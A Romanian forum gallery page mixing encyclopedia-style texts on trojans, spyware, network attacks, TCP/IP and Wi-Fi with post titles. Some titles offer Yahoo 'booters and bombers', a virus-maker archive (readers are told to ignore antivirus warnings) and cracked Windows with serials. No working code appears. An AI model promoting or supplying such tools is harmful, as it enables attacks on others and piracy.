Colectia de poze blaze24.3xforum.ro
Total 43 poze.

Inainte

 
acest articol se la o formă de malware în pentru alte sensuri, cal troian un cal troian, înAcest articol se referă la o anumită formă de malware în terminologie computaţională. Pentru alte sensuri, vedeţi Cal troian (dezambiguizare)) Un cal troian, în engleză, Trojan horse, cunoscut de asemenea doar ca troian , în cazul software-ul computerelor (având numele derivat din legenda calului troian) descrie un anumit tip de spyware (care este la rândul său un tip de malware), care apare că ar realiza ceva util, dar care în realitate realizează funcţii malefice care permit accesarea neautorizată a unui calculator, respectiv copierea fişierelor, şi chiar controlarea comenzilor calculatorui penetrat. Caii troieni, care tehnic nu sunt viruşi informatici, pot fi descărcaţi cu uşurinţă şi în necunoştiinţă de cauză. Spre exemplu, dacă un joc pe calculator este astfel designat ca la executarea sa de către un utilizator deschide o back door pentru un hacker, care poate prelua ulterior controlul computerului, se spune despre acel joc că este un cal troian. Dacă în schimb, jocul este corect designat, dar a fost infectat ulterior cu un virus informatic, nu poate fi numit un cal troian, indiferent ce pagube poate produce virusul. Malware este un cuvânt creat din cuvintele malicious şi software, ambele provenite din limba engleză, care se referă la un tip de software proiectat pentru infiltrarea şi/sau deteriorarea unui sistem al unui computer, sau a unei reţele de computere, fără acceptarea proprietarului computerului sau a reţelei. Termenul malware este unul de utilizare mai generală folosit de profesioniştii computerelor pentru a desemna orice formă ostilă, intrusivă sau supărătoare de software sau de cod al unui program. Termenul de virus al unui computer este uneori utilizat printr-o largă includere a diferite forme de malware, incluzând însişi viruşii informatici. Spyware este denumirea dată unei categorii de programe de calculator, de obicei ataşat unor programe gratuite (jocuri gratuite, programe de schimbat fişiere, programe de chat pornografic, etc.) care este folosit pentru a capta date de marketing (prin a analiza ce situri caută utilizatorul, de exemplu: modă, pantofi, cluburi de tenis, ş.a.m.d.) şi de a transmite eventual acelui utilizator reclame conform datelor de marketing extrase de spyware. Varianta de spyware care nu extrage date de marketing, ci doar transmite reclame se numeşte adware. Există programe de spyware care modifică modul de comportare a unor motoare de căutare (Google, Yahoo, MSN, etc.) pentru a trimite utilizatorul la situri (scumpe) care plătesc comisioane producătorului de spyware. Unele programe spyware utilizează procesorul calculatorului dumneavoastră pentru a face calcul distribuit (de exemplu, operaţiuni contabile pentru firme din India). SETI@home face acelaşi lucru dar nu este considerat spyware, deoarece face acest lucru numai cu consimţământul activ şi conştient al utilizatorului. Din motivul că al dumneavoastră calculator lucrează preponderent pentru altcineva, programele de spyware fac calculatorul lent. Ele pot uneori să blocheze conexiunea la internet (ca efect neintenţionat). În general, la ştergerea programului gratuit care a instalat spyware, spywareul rămâne activ în continuare. Există o sumedenie de programe anti-spyware, unele dintre ele fiind false anti-spyware care ele însele conţin spyware. :hi: :hi: :hi:
01.10.200917.3KB
fir sunt de aparate pe bază de unde radio, şi alte metode fir (în tip wireless; se ÎnReţelele fără fir sunt reţele de aparate interconectate pe bază de unde radio, infraroşii şi alte metode fără fir (în engleză: tip wireless; se pronunţă aproximativ u'a-iă-les). În ultimii ani ele au cunoscut o dezvoltare semnificativă pe plan mondial, reprezentând o soluţie alternativă la legăturile terestre. Conexiunile fără fir devin tot mai populare, deoarece ele rezolvă probleme ce apar în cazul cînd avem multe cabluri, conectate la multe dispozitive. Tehnologiile moderne pot interconecta echipamentele (sau şi LAN-urile) la distanţe mici, dar şi la distanţe mari. O reţea fără fir (Wireless Local Area Network, WLAN) este un sistem de comunicaţii implementat ca extensie la, sau alternativă pentru un LAN cablat, într-o clădire sau campus, combinând conectivitatea la viteză mare cu mobilitatea utilizatorilor, într-o configuraţie mult simplificată. Avantaje evidente, cum ar fi: mobilitate, flexibilitate, simplitate în instalare, costuri de întreţinere reduse şi scalabilitate au impus WLAN ca o soluţie tot mai mult utilizată. WiMAX În prezent există mai multe moduri de a capta datele din eter: Wi-Fi, Bluetooth, GPRS, 3G ş.a. Acestora li se adaugă o nouă tehnologie care poate capta datele de şapte ori mai repede şi de o mie de ori mai departe decât populara tehnologie Wireless Fidelity (Wi-Fi), numită WiMAX. În timp ce reţelele Wi-Fi simple au o rază de acţiune de aproximativ 30 m, WiMax utilizează o tehnologie de microunde radio care măreşte distanţa la aproximativ 50 km. Astfel, se pot construi reţele metropolitane WiMAX. Tipuri de echipamente Echipamentele de transmisie/recepţie wireless sunt de obicei de două tipuri: Staţii bază (Base Stations) Staţii client (Subscriber Units) Staţiile bază au deschiderea antenei de obicei de la 60 pînă la 360 de grade, asigurând conectivitatea clienţilor pe o anumită arie. Ele pot fi legate la o reţea cablată prin fibră optică, cabluri metalice sau chiar relee radio. Staţiile client au antene cu deschidere mult mai mică şi trebuie orientate spre BS-uri. Subnivelul MAC are următoarele sarcini: a. Pentru staţiile client: Autentificare (înregistrare în condiţii sigure) Deautentificare (dezînregistrare în condiţii sigure) Transmisie în condiţii de siguranţă Livrare MSDU (MAC Service Data Units) între echipamentele wireless b. Pentru staţiile bază: Asociere (înregistrare) Deasociere (dezînregistrare) Distribuţie cadre MAC Integrare (reţeaua existentă wireless poate comunica cu reţele bazate pe alt tip de tehnologie wireless) Reasociere (suportă cedarea dinamică a clienţilor unui alt BS, precum şi comuni-carea cu alte BS) Antenele În general, pentru orice echipament wireless, fie acesta o staţie bază – fie o staţie client, antenele sînt cele care oferă robusteţe şi flexibilitate. Chiar dacă sunt abia amintite în discuţiile pe marginea reţelelor fără fir, antenele sunt cele care optimizează anumite aplicaţii, cum ar fi legătura între mai multe clădiri. Întrucât mediul fără fir este unul foarte dinamic, prin folosirea unor antene direcţionale se poate influenţa modalitatea de propagare a semnalului radio. Astfel, energia şi caracteristica unui semnal pot fi direcţionate de-a lungul unui culoar îngust în loc să se lovească de pereţi, ceea ce ar duce la o risipă de energie sau poate cauza interferenţe nedorite. Antenele omnidirecţionale emit undele radio în toate direcţiile (sferă) în timp ce antenele unidirecţionale concentrează semnalul pe o direcţie preferenţială dată de orientarea antenei. Cu cât unghiul de emisie este mai mic, cu atât mai mare este distanţa acoperită. Avantajul antenelor omnidirecţionale constă în faptul că antena clientului nu trebuie să fie foarte precis orientată, fiind suficient să se afle în aria de acoperire a antenei staţiei bază. Dezavantajele sunt numeroase: risipă de putere de emisie, securitate scăzută datorită riscului ridicat de interceptare a undelor radio. Antenele unidirecţionale se situează pe o poziţie mai bună în ceea ce priveşte folosirea mai eficientă a puterii de emisie dar şi a riscului mai scăzut de interceptare a transmisiei. Dezavantajul lor constă în faptul că acordarea antenelor bază-client trebuie făcută foarte precis şi dimensiunea este semnificativă. Trebuie notat că diversitatea antenelor oferă beneficii substanţiale implementărilor LAN fără fir, cum ar fi luxul folosirii mai multor antene sau posibilitatea de a alege cel mai bun tip de antenă pentru o locaţie dată. Pentru aceasta este nevoie de o bună cunoaştere a proprietăţilor semnalului radio şi a modalităţilor de amplasare corectă a antenelor radio. În practică, antenele amplasate prea aproape una de alta vor duce la o degradare a performanţei receptorului. Utilizarea diferitelor tipuri de antenă are, de asemenea, impact şi asupra metodei, dar şi a rezultatelor monitorizării unei locaţii. În practică, antenele unidirecţionale se folosesc numai pentru legături fixe de tipul punct-la-punct, cum ar fi cazul unui bridge sau router de tip wireless. Clasificare Wireless Personal Area Network(WPAN). Wireless Local Area Network(WLAN). Wireless Metropolitan Area Network(WMAN)- Standardul 802.16 sau WiMAX. Wireless Wide Area Network(WWAN). Adus de la :hi:
01.10.200917.3KB
yahoo booters, bombers, and account removers
30.09.200917.3KB
atacuri interne unei de mai multe de securitate provin din interiorul care se află sub atac. Atacuri interne Penetrarea unei reţele de calculatoreCele mai multe încălcări de securitate provin din interiorul reţelelor care se află sub atac. La atacurile interne se referă furt de parole (care pot fi utlizate sau vândute), spionaj industrial, angajaţi nemulţumiţi care tind de a cauza daune angajatorului, sau simpla utilizare necorespunzătoare. Majoritatea acestor încălcări pot fi soluţionate cu ajutorul ofiţerului de securitate a companiei, care monitorizează activitatea angajaţilor a companiei. Puncte de acces nesecurizate Aceste puncte de acces nesecurizate fără fir sunt foarte slabe împotriva atacurilor din exterior. Ele des sunt prezentate pe comunităţile locale ale hakerilor. Punctul slab este că orice persoană poate conecta un ruter fără fir ceea ce ar putea da acces neautorizat la o reţea protejată. Back Doors Comenzi rapide administrative, erori de configurare, parole uşor descifrabile pot fi utilizate de către hackeri pentru a avea acces. Cu ajutorul căutătorilor computerizaţi (bots), hackerii pot găsi punctul slab al reţelei. Denial of Service (DoS) Sniffing şi spoofingUn atac cibernetic de tip DoS (Denial of Service) sau DDoS (Distributed Denial of service) este o încercare de a face resursele unui calculator să fie indisponibile utilizatorului. Deşi mijloacele şi obiectivele de a efectua acest atac sunt variabile, în general acest atac reprezintă eforturile concentrate a unei sau a mai multor persoane de a preveni un site internet sau serviciu de a funcţiona eficient, temporar sau nelimitat. Autorii acestor atacuri de obicei ţintesc site-uri sau servicii găzduite pe servere de profil înalt, cum ar fi băncile, gateway-uri pentru plăţi prin carduri de credite, şi chiar servere. Anarchists, Crackers, Kiddies Anarhiştilor le place să scoată din funcţie lucrurile. De obicei obiectivul lor reprezintă de a exloata resursele şi de a ţinti reţele neprotejate. Crackerii sunt nişte persoane care au un hobby de a sparge parole şi de a dezvolta programe şi virusuri de tip calul troian (en:Trojan Horse), numite Warez. De obicei ei folosesc programele pentru uz propriu sau pentru a le relizeaza pentru profit. Script kiddies sunt persoane care nu au cunoştinţe sau aptitudini despre penetrarea unui sistem ei doar descarcă programe de tip Warez pe care apoi le lansează cu scopul de a produce pagube imense. Alte persoane sunt angajaţi nemulţumiţi, terorişti, cooperativele politice. Viruşi şi viermi Viruşii şi viermii reprezintă programe care au proprietatea de a se automultiplica sau fragmente de cod care se ataşează de alte programe (viruşi) sau calculatoare (viermii). Viruşii de obicei stau în calculatoarele gazdă, pe când viermii tind să se multiplice şi să se extindă prin intermediul reţelei. Trojan Horse Acest virus este principala cauză a tuturor atacuri a sistemelor informaţionale. Calul Troian se ataşează de alte programe. Când se descarcă un fişier care este infectat cu acest virus el la urma sa infectează sistemul, unde oferă hakerilor acces de la distanţă unde ei pot manipula cu sistemul. Botnets Îndată ce un calculator (sau mai probabil mai multe calculatoare) au fost compromise de un Troian, hackerul are acces la aceste calculatoare infectate, unde de aici ei pot lansa atacuri cum ar fi DDoS (Distribuited Denial of Service). Grupa de calculatoare care sunt sub controlul hakerului se numesc bontets. Cuvântul botnet provine de la robot, aceasta însemnând că calculatoarele îndeplinesc comenzile proprietarului lor, şi reţea însemnând mai multe calculatoare coordonate. Sniffing/Spoofing Sniffing se referă la actul de interceptare a pachetelor TCP. Spoofing se referă la actul de trimitere nelegitimă a unui packet de aşteptare ACK. :hi: :hi: :hi:
01.10.200917.3KB

 
advanced port scanner v1.3
30.09.200917.3KB
nu trebuie sa va speriati daca il gaseste ca fiind infectat. pe pc-ul vostru nu va face nimic dacaNu trebuie sa va speriati daca antivirusul il gaseste ca fiind infectat. Pe pc-ul vostru nu va face nimic daca nu rulati virusul creat. Maker 1.rar.html :nono: :nono: :nono:
26.09.200917.3KB
multi-ip changer 8.50
30.09.200917.3KB
nod32 antivirus system 2.70.16 - final - iplay
25.09.200917.3KB

 
yahoo messenger 10
30.09.200917.3KB
windows xp pro sp3 x86 (32bits) esential black 2009 serial included
30.09.200917.3KB
win xp pro sp3 (5508) vistavg ultimate xp+sata
30.09.200917.3KB
modelul tcp/ip control protocol) a fost creat de us dod (us department of defence - ministerul alModelul TCP/IP (Transmission Control Protocol/Internet Protocol) a fost creat de US DoD (US Department of Defence - Ministerul Apărării Naţionale al Statelor Unite) din necesitatea unei reţele care ar putea supravieţui în orice condiţii. DoD dorea ca, atâta timp cât funcţionau maşina sursă şi maşina destinaţie, conexiunile să rămână intacte, chiar dacă o parte din maşini sau din liniile de transmisie erau brusc scoase din funcţiune. Era nevoie de o arhitectură flexibilă, deoarece se aveau în vedere aplicaţii cu cerinţe divergente, mergând de la transferul de fişiere până la transmiterea vorbirii în timp real. Aceste cerinţe au condus la alegerea a patru niveluri pentru modelul TCP/IP: Aplicaţie, Transport, Reţea (sau Internet) şi Acces la Reţea. Nivelul Aplicaţie Nivelul aplicaţie se referă la protocoalele de nivel înalt folosite de majoritatea aplicaţiilor, precum terminalul virtual (TELNET), transfer de fişiere (FTP) şi poşta electronică (SMTP). Alte protocoale de nivel aplicaţie sunt DNS (Domain Name Service), NNTP sau HTTP. În majoritate implementărilor, nivelul aplicaţie tratează nivelurile inferioare ca o "cutie neagră" care oferă o infrastructură sigură de comunicaţii, deşi majoritatea aplicaţiilor cunosc adresa IP sau portul folosit. Majoritatea protocoalelor de la nivelul aplicaţie sunt asociate cu modelul client-server. Serverele au de obicei asociate porturi fixe, atribuite de IANA: HTTP are portul 80, FTP portul 21, etc. În schimb, clienţii folosesc porturi temporare. Nivelul Transport Este identic cu cel din modelul OSI, ocupându-se cu probleme legate de siguranţă, control al fluxului şi corecţie de erori. El este proiectat astfel încât să permită conversaţii între entităţile pereche din gazdele sursă, respectiv, destinaţie. În acest sens au fost definite două protocoale capăt-la-capăt. Primul din ele, TCP (Trasmission Control Protocol). El este un protocol sigur orientat pe conexiune care permite ca un flux de octeţi trimişi de pe o maşină să ajungă fără erori pe orice altă maşină din inter-reţea. Acest protocol fragmentează fluxul de octeţi în mesaje discrete şi pasează fiecare mesaj nivelului internet. TCP tratează totodată controlul fluxului pentru a se asigura că un emiţător rapid nu inundă un receptor lent cu mai multe mesaje decât poate acesta să prelucreze. Al doilea protocol din acest nivel, UDP (User Datagram Protocol), este un protocol nesigur, fără conexiuni, destinat aplicaţiilor care doresc să utilizeze propria lor secvenţiere şi control al fluxului. Protocolul UDP este de asemenea mult folosit pentru interogări rapide întrebare-răspuns, client-server şi pentru aplicaţii în care comunicarea promptă este mai importatntă decât comunicarea cu acurateţe, aşa cum sunt aplicaţiile de transmisie a vorbirii şi a imaginilor video. Nivelul Reţea (Internet) Scopul iniţial al nivelului reţea era să asigure rutarea pachetelor în interiorul unei singure reţele. Odată cu apariţia interconexiunii între reţele, acestui nivel i-au fost adăugate funcţionalităţi de comunicare între o reţea sursă şi o reţea destinaţie. În stiva TCP/IP, protocolul IP asigură rutarea pachetelor de la o adresă sursă la o adresă destinaţie, folosind şi unele protocoale adiţionale, precum ICMP sau IGMP. Determinarea drumului optim între cele două reţele se face la acest nivel. Comunicarea la nivelul IP este nesigură, sarcina de corecţie a erorilor fiind plasată la nivelurile superioare (de exemplu prin protocolul TCP). În IPv4 (nu şi IPv6), integritatea pachetelor este asigurată de sume de control. Nivelul Acces la reţea Se ocupă cu toate problemele legate de transmiterea efectivă a ZU-ului pe o legătură fizică, incluzând şi aspectele legate de tehnologii şi de medii de transmisie, adică nivelurile OSI Legătură de date şi Fizic. Modelul de referinţă TCP/IP nu spune mare lucru despre ce se întâmplă acolo, însă menţionează că gazda trebuie să se lege la reţea, pentru a putea trimite pachete IP, folosind un anumit protocol. Acest protocol nu este definit şi variază de la gazdă la gazdă şi de la reţea la reţea. :hi: :hi: :hi:
01.10.200917.3KB

 
tested by kaspersky anti-virus total video converter v3.1 full Tested by Kaspersky Anti-Virus
30.09.200917.3KB
standardul ieee802.16 “air interface for fixed broadband wireless ac-cess systems” este cunoscutStandardul IEEE802.16 “Air Interface for Fixed Broadband Wireless Ac-cess Systems” este cunoscut şi ca interfaţă aeriană IEEE WirelessMAN. Această tehnologie a fost proiectată să ofere access fară fir de bandă largă în reţele metro-politane cu performanţe comparabile cu cablul tradiţional, DSL, şi T1. Avantajele sistemelor bazate pe 802.16 sunt multiple: abilitatea de a porni rapid acest serviciu chiar şi în zone unde ar fi greu de ajuns cu interfeţe pe bază de cablu, evitarea cos-turilor mari de instalare, şi posibilitatea de a depaşi limitările fizice ale infrastructu-rilor tradiţionale cu conexiune prin fir. Instalarea unei conexiuni prin fir cu bandă largă pe baza de cablu sau DSL poate fi un process consumator de timp, avînd ca rezultat faptul că un mare număr de zone din toată lumea nu are acces la conexiuni de bandă largă. Tehnologia fară fir 802.16 oferă o modalitate flexibilă, eficientă din punct de vedere al costurilor, bazată pe standarde, de a umple aceste lipsuri în acoperirea de bandă largă. Bazîndu-se pe experienţa a sute de ingineri din industria comunicaţiilor, IEEE a stabilit o ierarhie de standarde wireless complementare. Sunt incluse IEEE 802.15 pentru Personal Area Network (PAN), IEEE 802.11 pentru Local Area Network (LAN), 802.16 pentru Metropolitan Area Network, şi IEEE 802.20 pentru Wide Area Network (WAN). Fiecare standard reprezintă tehnologia optimizată pentru pieţe distincte şi modele de folosire diferite şi sunt create pentru a fi com-plementare. Creşterea răspîndirii reţelelor fără fir creşte cererea de legături broadband catre Internet, cerere care poate fi acoperită de 802.16 prin oferta de co-nexiuni outdoor pe distanţe mari către providerii de servicii. În ianuarie 2003, IEEE a aprobat standardul 802.16a care acoperă banda de frec-venţe între 2 GHz şi 11 GHz. Acest standard este o extensie a standardului IEEE 802.16 pentru 10-66 GHz publicat în Aprilie 2002. Frecvenţele sub 11Ghz oferă posibilitatea de a avea conexiuni în medii în care copacii sau construcţiile s-ar pu-tea interpune pe linia de vizibilitate a conexiunii. Cea mai obişnuită configuraţie 802.16a constă într-o staţie de bază montată pe o clădire sau un turn de comunicaţii, care functioneaza pe principiul point to multi-point(PMP) şi staţiile abonaţilor aflate în birouri sau case. 802.16a are o arie de acoperire de 30 mile cu raza unei celule de 4-6 mile. În raza celulei de acoperire performanţele non-line-of-sight(NLoS) şi viteza sunt optime. Adiţional 802.16a oferă o tehnologie wireless backhaul ideală pentru a conecta reţele fără fir 802.11 LAN şi puncte de interes prin intermediul Internetului. Tehnologia fără fir 802.16a dă posibilitatea afacerilor să instaleze puncte de interes în locaţii unde conexiunea prin fir nu poate fi instalată sau se instalează într-un interval de timp foarte mare. În acest fel această tehnologie oferă provider-ilor de servicii o modalitate de a creste pieţa utilizatorilor particulari la comunicaţii pe bandă largă. Cu rate de transfer de pană la 75Mbps o singură staţie de bază oferă sufici-entă bandă pentru a suporta simultan 60 de afaceri cu conexiune de nivel T1 şi sute de case cu conexiune de tip nivel DSL utilizand 20MHz din banda canalului. Pen-tru a suporta un model de afaceri profitabil, operatorii şi providerii de servicii tre-buie sa sustină un amestec de clienţi din clasa afaceri (cu abonamente cu preţuri ri-dicate) şi un număr foarte mare de abonaţi casnici. 802.16a ajută la realizarea aces-tor cerinţe prin suportarea de nivele de servicii differenţiate ce pot include nivele T1 garantate pentru afaceri sau nivele DSL pentru consumatorii casnici. Specifica-ţiile 802.16 includ de asemenea şi opţiuni pentru securitate şi QoS necesare pentru a suporta servicii care necesită latenţă mică, cum ar fi voce şi video. Serviciile de voce ale 802.16 pot fi traditionalul TDMV (Time Division Multiplexed Voice) sau Voice over IP (VoIP). :hi: :hi: :hi:
01.10.200917.3KB
wi-fi (ipa: este numele comercial pentru construite pe baza de din familia ieee 802.11 utilizateWi-Fi (IPA: /ˈwaɪfaɪ/) este numele comercial pentru tehnologiile construite pe baza standardelor de comunicaţie din familia IEEE 802.11 utilizate pentru realizarea de reţele locale de comunicaţie fără fir la viteze echivalente cu cele ale reţelelor Ethernet. Suportul pentru Wi-Fi este furnizat de diferite dispozitive hardware, şi de aproape toate sistemele de operare moderne pentru calculatoarele personale, routere, telefoane mobile şi cele mai avansate console de jocuri. Standardul IEEE 802.11 descrie protocoale de comunicaţie aflate la nivelul gazdă-reţea al Modelului TCP/IP, respectiv la nivelurile fizic şi legătură de date ale Modelului OSI. Aceasta înseamnă că implementările IEEE 802.11 trebuie să primească pachete de la protocoalele de la nivelul reţea (IP) şi să se ocupe cu transmiterea lor, evitând eventualele coliziuni cu alte staţii care doresc să transmită. 802.11 face parte dintr-o familie de standarde pentru comunicaţiile în reţele locale, elaborate de IEEE, şi din care mai fac parte standarde pentru alte feluri de reţele, inclusiv standardul 802.3, pentru Ethernet. Cum Ethernet era din ce în ce mai popular la jumătatea anilor 1990, s-au depus eforturi ca noul standard să fie compatibil Ethernet, din punctul de vedere al transmiterii pachetelor. Standardul a fost elaborat de IEEE în anii 1990, prima versiune a lui fiind definitivată în 1997. Acea versiune nu mai este folosită de implementatori, versiunile mai noi şi îmbunătăţite 802.11a/b/g fiind publicate între 1999 şi 2001. Din 2004, se lucrează la o nouă versiune, intitulată 802.11n şi care, deşi nu a fost definitivată, este deja implementată de unii furnizori de echipamente. Din punct de vedere al securităţii, IEEE şi Wi-Fi Alliance recomandă utilizarea standardului de securitate 802.11i, respectiv a schemei WPA2. Alte tehnici simple de control al accesului la o reţea 802.11 sunt considerate nesigure, cum este şi schema WEP, dependentă de un algoritm de criptare simetrică, RC4, nesigur. Limitările standardului provin din mediul fără fir folosit, care face reţelele IEEE 802.11 să fie mai lente decât cele cablate, de exemplu Ethernet, dar şi din folosirea benzii de frecvenţă de 2,4 GHz, împărţită în 12 canale care se suprapun parţial două câte două. Limitările date de consumul mare de energie, precum şi de reglementările privind puterea electromagnetică emisă, nu permit arii de acoperire mai mari de câteva sute de metri, mobilitatea în cadrul acestor reţele fiind restrânsă. Cu toate acestea, au apărut unele tehnologii care permit legături fără fir bazate pe standardul 802.11 între două puncte fixe aflate la distanţe de ordinul sutelor de kilometri. Cuprins 1 Stiva de protocoale IEEE 802.11 1.1 Nivelul fizic 1.2 Subnivelul accesului la mediu 1.2.1 Funcţia de coordonare distribuită 1.2.2 Funcţia de coordonare punctuală 1.2.3 Operarea mixtă 1.3 Controlul logic al legăturii 2 Formatul cadrului 3 Securitatea 3.1 Tehnici simple de control al accesului 3.2 WEP 3.3 WPA şi WPA2 4 Implementări hardware 5 Limitări 5.1 Rata de transfer 5.2 Aria de acoperire 5.3 Canalele 5.4 Consumul energetic 6 Note 7 Bibliografie Stiva de protocoale IEEE 802.11 Nivelul fizic Stiva protocoalelor IEEE 802.11, cu corespondenţa în modelele de referinţă OSI şi TCP/IP Protocoale Wi-Fi Nivel OSI Nivel TCP/IP LLC (802.2) Legătură de date Gazdă– reţea DCF CSMA/CA MAC PCF MAC Infraroşu FHSS DSSS OFDM (802.11a) HR-DSSS (802.11b) 802.11g Fizic Prima specificaţie IEEE 802.11, elaborată în 1997, permitea trei moduri principale de transmitere fără fir a biţilor. Prima dintre acestea era o tehnologie optică, cu transmitere în infraroşu, tehnologie similară cu cea folosită de telecomenzile diferitelor aparate electronice. Aceasta presupune însă limitarea ariei de acoperire a reţelei la încăperea în care este instalată, fapt ce poate fi văzut şi ca avantaj din punctul de vedere al securităţii. Viteza oferită de această tehnologie este de maximum 1–2 Mbps. Celelalte două tehnologii de transmisie sunt tehnologii radio în banda de 2,4 GHz, bandă ce nu necesită licenţe de utilizare. Din cauza libertăţii de utilizare a acestei benzi, ea este folosită şi de alte tehnologii, cum ar fi Bluetooth sau telefoanele fixe cordless, ceea ce poate cauza uneori interferenţe, deşi în general puterea de transmisie a tuturor acestor dispozitive este redusă. Prima se numeşte FHSS (spectru împrăştiat cu salturi de frecvenţă), şi, pentru a aloca eficient frecvenţele din banda de 2,4 GHz, presupune schimbarea periodică a frecvenţei de transmisie, în urma unor numere pseudoaleatoare generate de staţiile care comunică. Cealaltă tehnologie radio este DSSS (spectru împrăştiat cu secvenţă directă). Ambele oferă rate de transfer de maxim 1 sau 2 Mbps. În 1999, IEEE a mai standardizat două modalităţi de transmisie, cu scopul de a mări ratele de transfer, şi anume OFDM (multiplexare cu divizare în frecvenţe ortogonale), o tehnică simiară cu CDMA, prin aceea că transmisia este prezentă simultan pe mai multe frecvenţe; şi HR-DSSS, modalitate similară spectrului împrăştiat cu secvenţă directă, dar cu o rată mai ridicată de transmitere a fragmentelor, în bandă mai îngustă. OFDM permite, teoretic, viteze de transmisie de până la 54 Mbps, şi a fost standardizată sub denumirea IEEE 802.11a. HR-DSSS permite viteze de 1, 2, 5,5 sau 11 Mbps, între care poate schimba pe parcursul transmisiei. Standardul HR-DSSS a fost denumit IEEE 802.11b. În 2001, IEEE a publicat standardul 802.11g, o specificaţie ce combină banda îngustă a HR-DSSS cu tehnica de modulaţie OFDM. Din 2004, IEEE are în lucru şi standardul 802.11n, care deja a început să fie implementat de mai mulţi producători de echipamente. Data aşteptată a definitivării specificaţiei este iunie 2010. Prin acest standard, la nivelul fizic se aduc tehnologiile MIMO şi Channel Bonding. MIMO presupune folosirea de mai multe antene pentru a trata semnalele multicăi (unde ajunse la antenă pe alte căi decât de cea directă, prin reflexie, la momente de timp diferite de undele venite pe calea directă). MIMO profită de semnalele multicăi, folosind Space Division Multiplexing (SDM) şi multiplexând semnalele în fluxuri spaţiale. Fiecare flux spaţial necesită la receptor şi transmiţător o antenă separată. Channel Bonding înseamnă folosirea a două canale separate, fiecare cu o lăţime de bandă de 20 MHz pentru transmisia datelor, dublând rata fizică de transfer. IEEE şi-a propus, prin tehnologia 802.11n să ofere un standard ce poate furniza rate de transfer de 270 Mbps. Subnivelul accesului la mediu Există două tehnici principale de acces la mediu în standardul 802.11. Una este funcţia de coordonare distribuită (în engleză Distributed Control Function, DCF), prin care staţiile controlează fiecare propriul acces la mediu, similar Ethernetului, constituind o reţea ad-hoc fără fir. Cealaltă metodă de control al accesului la mediu se numeşte funcţie de coordonare punctuală (în engleză Point Coordination Function, PCF) şi implică arbitrajul centralizat al accesului la mediu, cu ajutorul unei staţii de bază. Funcţia de coordonare distribuită Problema staţiei ascunse: A încearcă să transmită lui B în timp ce C transmite deja; A crede că nu va fi nicio coliziune. Problema staţiei expuse: B vrea să-i transmită lui A în timp ce C transmite altcuiva. B crede că va avea loc coliziune la AS-a încercat ca modelarea nivelului legătură de date a standardului IEEE 802.11 să fie cât mai similară cu standardul 802.3 (Ethernet), deja familiar implementatorilor. Realizarea controlului accesului la mediu prin tehnica CSMA/CD de la Ethernet nu este însă posibilă, deoarece caracteristicile mediului sunt foarte diferite. La Ethernet, exista întotdeauna certitudinea că, odată transmis un semnal pe mediu (cablu), acesta ajunge la toate staţiile din domeniul de coliziuni. În cazul 802.11 mediul nu mai este însă cablul, ci eterul. Domeniul de coliziuni este aici mărginit de puterea de transmisie a emiţătorului radio al staţiei care transmite şi este influenţat de poziţia spaţială a staţiilor, ducând la probleme ca staţia ascunsă şi staţia expusă, probleme ce afectează funcţionarea CSMA/CD. Problema staţiei ascunse apare când o staţie A transmite unei staţii B în timp ce aceasta din urmă primeşte mesaje de la o altă staţie C, aflată în afara ariei de acoperire a lui A. A nu recepţionează semnalul trimis de C, deci nu poate detecta coliziunea în caz de transmisie pe aceeaşi frecvenţă. Similar, problema staţiei expuse apare în exemplul de mai sus dacă B vrea să-i transmită lui A, ascultă canalul şi constată că în acel moment transmite C, dar A şi C nu se văd una pe cealaltă şi la destinaţie nu ar fi nicio coliziune. Din aceste motive, CSMA/CD nu este utilizabil în contextul reţelelor fără fir. Cum coliziunile sunt foarte greu de detectat, IEEE a recurs la o altă strategie de control al accesului la mediu, şi anume CSMA cu evitarea coliziunilor (în engleză CSMA with collision avoidance, CSMA/CA). Cum canalul trebuie să fie liber şi la transmiţător şi la destinatar, transmiţătorul transmite doar când simte canalul liber. În acel moment, el trimite un cadru RTS (Request To Send) şi aşteaptă răspunsul o perioadă, repetând cererea dacă trece un anumit timp. Destinatarul, dacă este liber, răspunde cu un CTS (Clear To Send). După primirea CTS, transmiţătorul trimite cadrul de date, după care aşteaptă confirmarea receptorului. Toate staţiile altele decât cele două şi care primesc un RTS sau un CTS transmis de altcineva îşi iau o perioadă de aşteptare în care nu transmit, pentru a evita coliziunea cu cadrele transmise de celelalte staţii. Funcţia de coordonare punctuală În cazul funcţiei de coordonare punctuală, există o aşa-numită staţie de bază, care poate fi un punct de acces IEEE 802.11, un ruter cu capabilităţi IEEE 802.11, sau un calculator cu interfaţă de reţea 802.11 configurată în modul de lucru master. Această funcţie de coordonare se bazează pe ideea că staţia de bază este cea care controlează accesul la mediu, acordând câte o cuantă de timp fiecărui dispozitiv conectat. În acest fel, întrucât staţiile transmit doar atunci când li se permite, sunt evitate coliziunile. Periodic, staţia de bază emite un cadru-baliză (în engleză beacon frame) care conţine setări privind conexiunea fizică (de exemplu, duratele de timp pentru saltul de la o frecvenţă la alta în cazul utilizării FHSS) şi care cere staţiilor ce doresc să se conecteze să anunţe acest lucru. Staţia de bază poate, de asemenea, în cazul în care poate păstra într-un buffer cadrele primite, să ceară unei staţii conectate să treacă în stand-by şi să o trezească atunci când aceasta a primit mai multe cadre. Operarea mixtă Cele două funcţii, coordonarea punctuală şi cea distribuită, nu sunt mutual exclusive, ele putând fi folosite simultan în aceeaşi reţea. Pentru aceasta, un cadru de confirmare (ACK) venit în urma transmiterii unui cadru de date este urmat de o perioadă de „linişte”, în care, după anumite perioade de timp, se pot trimite diferite alte tipuri de cadre (cadre baliză ale staţiei de bază, cadre RTS/CTS, sau cadre ce semnalează erori). Controlul logic al legăturii Controlul logic al legăturii (în engleză Logical Link Control, LLC) este un subnivel al nivelului legătură de date din modelul OSI care se ocupă cu controlul fluxului datelor. La acest nivel se preiau pachetele de la protocoalele de nivel 3 (de exemplu, IP sau IPX) şi se adaugă într-un antet LLC informaţii necesare la destinaţie pentru a decide cărui protocol sunt destinate pachetele respective. Fiind independent de mediul de transmisie, LLC a fost standardizat de IEEE sub numele de IEEE 802.2, mult înainte de elaborarea standardului 802.11, fiind utilizat deja şi în alte tehnologii de reţea din seria IEEE 802, cum ar fi Ethernet sau FDDI. Folosirea de către 802.11 a subnivelului LLC aşa cum este el definit în standardul 802.2 a ajutat la îndeplinirea scopului de a realiza o tehnologie fără fir compatibilă cu Ethernet. Formatul cadrului Există mai multe tipuri de cadre transmise în cadrul IEEE 802.11—cadre de confirmare, cadre RTS/CTS, cadre de date, cadre ce semnalează diverse erori, cadre de autentificare, asociere sau reasociere cadre baliză, cadre de căutare şi răspuns la căutare. Ele sunt identificate în primul rând după primii doi octeţi ai acestora, care formează antetul de control al 